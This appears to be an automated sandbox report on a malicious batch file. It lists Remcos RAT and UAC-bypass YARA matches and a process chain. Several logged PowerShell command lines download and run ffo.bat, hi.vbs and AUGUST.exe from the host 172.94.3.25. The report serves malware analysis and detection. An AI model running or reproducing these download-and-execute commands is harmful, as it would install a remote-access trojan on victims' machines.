                      Source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: classification engineClassification label: mal100.troj.expl.evad.winBAT@42/32@0/2
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,14_2_00407776
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_0040118A GetDiskFreeSpaceExW,SendMessageW,14_2_0040118A
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,14_2_004034C1
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,14_2_00401BDF
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\ffo.batJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjs0e3py.sx3.ps1Jump to behavior
                      Source: Yara matchFile source: 15.0.DZIPR.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000000.2725735029.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2720616296.00000000026D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\DZIPR.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, type: DROPPED
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbs
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exe
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeProcess created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"
                      Source: C:\Users\user\DZIPR.exeProcess created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.batJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeProcess created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe" Jump to behavior
                      Source: C:\Users\user\DZIPR.exeProcess created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
